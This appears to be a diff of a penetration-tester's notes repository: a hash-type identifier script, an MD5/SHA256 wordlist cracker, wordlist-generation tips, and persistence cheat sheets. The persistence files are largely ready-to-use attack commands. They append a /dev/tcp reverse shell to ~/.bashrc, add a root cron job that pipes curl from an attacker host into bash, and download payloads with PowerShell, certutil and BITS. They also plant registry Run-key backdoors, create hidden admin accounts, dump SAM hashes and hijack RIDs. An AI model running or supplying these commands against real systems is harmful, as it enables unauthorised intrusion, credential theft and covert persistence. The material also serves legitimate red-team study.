if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106240")
def md5saltmd5pass(hash):
hs='245c5763b95ba42d4b02d44bbcd916f1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106260")
def md5saltpass(hash):
hs='22cc5ce1a1ef747cd3fa06106c148dfa'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106280")
def md5saltpasssalt(hash):
hs='469e9cdcaff745460595a7a386c4db0c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106300")
def md5saltpassusername(hash):
hs='9ae20f88189f6e3a62711608ddb6f5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106320")
def md5saltmd5pass(hash):
hs='aca2a052962b2564027ee62933d2382f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106340")
def md5saltmd5passsalt(hash):
hs='de0237dc03a8efdf6552fbe7788b2fdd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106360")
def md5saltmd5passsalt(hash):
hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106380")
def md5saltmd5saltpass(hash):
hs='d8f3b3f004d387086aae24326b575b23'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106400")
def md5saltmd5md5passsalt(hash):
hs='81f181454e23319779b03d74d062b1a2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106420")
def md5username0pass(hash):
hs='e44a60f8f2106492ae16581c91edb3ba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106440")
def md5usernameLFpass(hash):
hs='654741780db415732eaee12b1b909119'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106460")
def md5usernamemd5passsalt(hash):
hs='954ac5505fd1843bbb97d1b2cda0b98f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106480")
def md5md5pass(hash):
hs='a96103d267d024583d5565436e52dfb3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106500")
def md5md5passsalt(hash):
hs='5848c73c2482d3c2c7b6af134ed8dd89'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106520")
def md5md5passmd5salt(hash):
hs='8dc71ef37197b2edba02d48c30217b32'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106540")
def md5md5saltpass(hash):
hs='9032fabd905e273b9ceb1e124631bd67'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106560")
def md5md5saltmd5pass(hash):
hs='8966f37dbb4aca377a71a9d3d09cd1ac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106580")
def md5md5usernamepasssalt(hash):
hs='4319a3befce729b34c3105dbc29d0c40'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106600")
def md5md5md5pass(hash):
hs='ea086739755920e732d0f4d8c1b6ad8d'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106620")
def md5md5md5md5pass(hash):
hs='02528c1f2ed8ac7d83fe76f3cf1c133f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106640")
def md5md5md5md5md5pass(hash):
hs='4548d2c062933dff53928fd4ae427fc0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106660")
def md5sha1pass(hash):
hs='cb4ebaaedfd536d965c452d9569a6b1e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106680")
def md5sha1md5pass(hash):
hs='099b8a59795e07c334a696a10c0ebce0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106700")
def md5sha1md5sha1pass(hash):
hs='06e4af76833da7cc138d90602ef80070'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106720")
def md5strtouppermd5pass(hash):
hs='519de146f1a658ab5e5e2aa9b7d2eec8'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106740")
def LineageIIC4(hash):
hs='0x49a57f66bd3d5ba6abda5579c264a0e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0:
jerar.append("107080")
def MD5phpBB3(hash):
hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0:
jerar.append("107040")
def MD5Unix(hash):
hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0:
jerar.append("107060")
def MD5Wordpress(hash):
hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0:
jerar.append("107020")
def MD5APR(hash):
hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0:
jerar.append("108020")
def Haval160(hash):
hs='a106e921284dd69dad06192a4411ec32fce83dbb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109100")
def Haval160HMAC(hash):
hs='29206f83edc1d6c3f680ff11276ec20642881243'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109200")
def MySQL5(hash):
hs='9bb2fb57063821c762cc009f7584ddae9da431ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109040")
def MySQL160bit(hash):
hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0:
jerar.append("109060")
def RipeMD160(hash):
hs='dc65552812c66997ea7320ddfb51f5625d74721b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109120")
def RipeMD160HMAC(hash):
hs='ca28af47653b4f21e96c1235984cb50229331359'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109180")
def SHA1(hash):
hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109020")
def SHA1HMAC(hash):
hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109140")
def SHA1MaNGOS(hash):
hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109220")
def SHA1MaNGOS2(hash):
hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109240")
def Tiger160(hash):
hs='c086184486ec6388ff81ec9f235287270429b225'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109080")
def Tiger160HMAC(hash):
hs='6603161719da5e56e1866e4f61f79496334e6a10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109160")
def sha1passsalt(hash):
hs='f006a1863663c21c541c8d600355abfeeaadb5e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109260")
def sha1saltpass(hash):
hs='299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109280")
def sha1saltmd5pass(hash):
hs='860465ede0625deebb4fbbedcb0db9dc65faec30'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109300")
def sha1saltmd5passsalt(hash):
hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109320")
def sha1saltsha1pass(hash):
hs='58714327f9407097c64032a2fd5bff3a260cb85f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109340")
def sha1saltsha1saltsha1pass(hash):
hs='cc600a2903130c945aa178396910135cc7f93c63'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109360")
def sha1usernamepass(hash):
hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109380")
def sha1usernamepasssalt(hash):
hs='00025111b3c4d0ac1635558ce2393f77e94770c5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109400")
def sha1md5pass(hash):
hs='fa960056c0dea57de94776d3759fb555a15cae87'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("1094202")
def sha1md5passsalt(hash):
hs='1dad2b71432d83312e61d25aeb627593295bcc9a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109440")
def sha1md5sha1pass(hash):
hs='8bceaeed74c17571c15cdb9494e992db3c263695'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109460")
def sha1sha1pass(hash):
hs='3109b810188fcde0900f9907d2ebcaa10277d10e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109480")
def sha1sha1passsalt(hash):
hs='780d43fa11693b61875321b6b54905ee488d7760'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109500")
def sha1sha1passsubstrpass03(hash):
hs='5ed6bc680b59c580db4a38df307bd4621759324e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109520")
def sha1sha1saltpass(hash):
hs='70506bac605485b4143ca114cbd4a3580d76a413'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109540")
def sha1sha1sha1pass(hash):
hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109560")
def sha1strtolowerusernamepass(hash):
hs='79f575543061e158c2da3799f999eb7c95261f07'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109580")
def Haval192(hash):
hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110040")
def Haval192HMAC(hash):
hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110080")
def Tiger192(hash):
hs='c086184486ec6388ff81ec9f235287270429b2253b248a70'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110020")
def Tiger192HMAC(hash):
hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110060")
def MD5passsaltjoomla1(hash):
hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("112020")
def SHA1Django(hash):
hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0:
jerar.append("113020")
def Haval224(hash):
hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114040")
def Haval224HMAC(hash):
hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114080")
def SHA224(hash):
hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114020")
def SHA224HMAC(hash):
hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114060")
def SHA256(hash):
hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115020")
def SHA256HMAC(hash):
hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115120")
def Haval256(hash):
hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115040")
def Haval256HMAC(hash):
hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115140")
def GOSTR341194(hash):
hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115060")
def RipeMD256(hash):
hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115080")
def RipeMD256HMAC(hash):
hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115160")
def SNEFRU256(hash):
hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115100")
def SNEFRU256HMAC(hash):
hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115180")
def SHA256md5pass(hash):
hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115200")
def SHA256sha1pass(hash):
hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115220")
def MD5passsaltjoomla2(hash):
hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("116020")
def SAM(hash):
hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0:
jerar.append("116040")
def SHA256Django(hash):
hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0:
jerar.append("117020")
def RipeMD320(hash):
hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118020")
def RipeMD320HMAC(hash):
hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118040")
def SHA384(hash):
hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119020")
def SHA384HMAC(hash):
hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119040")
def SHA256s(hash):
hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
jerar.append("120020")
def SHA384Django(hash):
hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
jerar.append("121020")
def SHA512(hash):
hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122020")
def SHA512HMAC(hash):
hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122060")
def Whirlpool(hash):
hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122040")
def WhirlpoolHMAC(hash):
hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122080")
print(logo)
try:
first = str(argv[1])
except:
first = None
while True:
try:
jerar=[]
print("-"*50)
if first:
h = first
else:
h = input(" HASH: ")
ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h)
if len(jerar)==0:
print("\n Not Found.")
elif len(jerar)>2:
jerar.sort()
print("\nPossible Hashs:")
print("[+] "+str(algorithms[jerar[0]]))
print("[+] "+str(algorithms[jerar[1]]))
print("\nLeast Possible Hashs:")
for a in range(int(len(jerar))-2):
print("[+] "+str(algorithms[jerar[a+2]]))
else:
jerar.sort()
print("\nPossible Hashs:")
for a in range(len(jerar)):
print("[+] "+str(algorithms[jerar[a]]))
first = None
except KeyboardInterrupt:
print("\n\n\tBye!")
exit()

20
Hashes/Scripts/hash_cracker.py Executable file
View File

@ -0,0 +1,20 @@
#!/usr/bin/env python
import hashlib
import pyfiglet
print(pyfiglet.figlet_format("md5 cracker"))
wordlist_location = str(input("Wordlist file location: "))
hash_input = str(input("Enter hash to be cracked: "))
with open(wordlist_location, 'rb') as _f:
for line in _f.readlines():
line = line.strip()
hash_ob = hashlib.sha256(line)
#hash_ob = hashlib.md5(line)
hashed_pass = hash_ob.hexdigest()
print(line)
if hashed_pass == hash_input:
print("Password found: " + line.decode())
exit(0)

48
Hashes/Wordlists.md Normal file
View File

@ -0,0 +1,48 @@
# Generate Wordlists
* [username_generator](https://github.com/therodri2/username_generator.git)
* [CeWL](../enumeration/CeWL/README.md)
* [Mentalist](https://github.com/sc0tfree/mentalist.git)
* [lyricpass](https://github.com/initstring/lyricpass.git)
* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git)
## Cupp
* [cupp](https://github.com/Mebus/cupp.git)
* Interactive dialogue via `cupp.py -i`
* Wordlistdownload via `cupp.py -l`
* Connections to alecto DB via `-a`
## crunch
```sh
crunch <minlen> <maxlen> <charPool> -o <output.file>
```
* Option `-t` specifies variable characters
* `@`, lower case alpha characters
* `,`, upper case alpha characters
* `%`, numeric characters
* `^`, special characters including space
```sh
crunch 8 8 -t passw%%rd
```
## ttpassgen
* [ttpassgen](https://github.com/tp7309/TTPassGen.git)
* Generate lists from the ground up
* `pip install ttpassgen`
```sh
ttpassgen --rule '[?d]{6:6:*}' 6digitpins.txt
```
```sh
ttpassgen --rule '[?l]{1:5:*}' all_letter_combinations.txt
```
```sh
ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt
```
# exrex
* Generate all possible outcomes from regex string

8
Persistence/bashrc.md Normal file
View File

@ -0,0 +1,8 @@
# Bashrc Bogus
## Add Reverse Shell
```sh
echo 'bash -c "bash -i >& /dev/tcp/<attacker-IP>/<attacker-Port> 0>&1"' >> ~/.bashrc
```

15
Persistence/crontab.md Normal file
View File

@ -0,0 +1,15 @@
# Cronjobs
* `crontab -l`
* `cat /etc/crontab`
## Add Cronjob
* Add line
```sh
* * * * * root curl http://<attacker-IP>:8000/shell.sh | bash
```
* Shell content
```sh
bash -c "bash -i >& /dev/tcp/<attacker-IP>/<attacker-Port> 0&1"
```

6
Persistence/meterpreter.md Normal file
View File

@ -0,0 +1,6 @@
# Meterpreter Persistence
## Load shell on system startup
```sh
run persistence -X
```

323
Persistence/persistence.md Normal file
View File

@ -0,0 +1,323 @@
# Persistence
* Gain through
* Startup folder persistence
* Editing registry keys
* Scheduled tasks
* SUID
* BITS
* Creating a backdoored service
* Creat user
* RDP
## Gain Persistence on Windows
* Browser. Add to trusted sites.
* Powershell
```sh
Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe
```
* DOSprompt
```cmd
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
```
* Use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp`
### Paths to Persistence
* Put in startup directory
```sh
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```
* Put the reverse_shell into `%appdata%` and add a registry key
```sh
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe"
```
### Background Intelligence Transfer Service (BITS)
```sh
bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
```
```sh
bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay 30
bitsadmin /resume
```
## Elevate Privileges
* Create user `net user /add <user> <pass>`
* Add to admin group via `net localgroup administrators <user> /add`
* Check `net localgroup Administrator`
### More stealthy
* Backup Operator group is more stealthy, no admin by r/w on files
```sh
net localgroup "Backup Operators" <user> /add
net localgroup "Remote Management Users" <user> /add
```
* The following two groups are assigned through membership of `Backup Operators`
* SeBackupPrivilege, read files
* SeRestorePrivilege, write files
* Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via
```sh
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
```
* Afterwards, check if `Backup Operators` is enabled via `whoami /groups`
* Backup `SAM` and `SYSTEM` via
```sh
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
secretsdump.py -sam sam.bak -system system.bak LOCAL
```
* Pass-the-hash via evil-winrm
### secedit
* Get r/w on files through editing a config file
* Export secedit and open it
```sh
secedit /export /cfg config.inf
```
* Add user to the groups
```sh
SeBackupPrivilege = [...],<username>
SeRestorePrivilege = [...],<username>
```
* Convert the file
```sh
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.infk
```
* Add the user to the RDP group via net localgroup like before or do
```sh
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
```
* Add & Click user -> Full Control(All Operations)
* Set `LocalAccountTokenFilterPolicy` to `1` like in the section before
### Relative ID (RID)
* UID like in linux
* Administrator has `RID = 500`
* Other interactive users `RID >= 1000`
* Get RIDs
```sh
wmic useraccount get name,sid
```
* Assign `500` to regular user
```sh
PsExec64.exe -i -s regedit
```
* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>`
* Search for RID value as hexadecimal value
* Open the key called `F` and change effective RID at position `0x30`
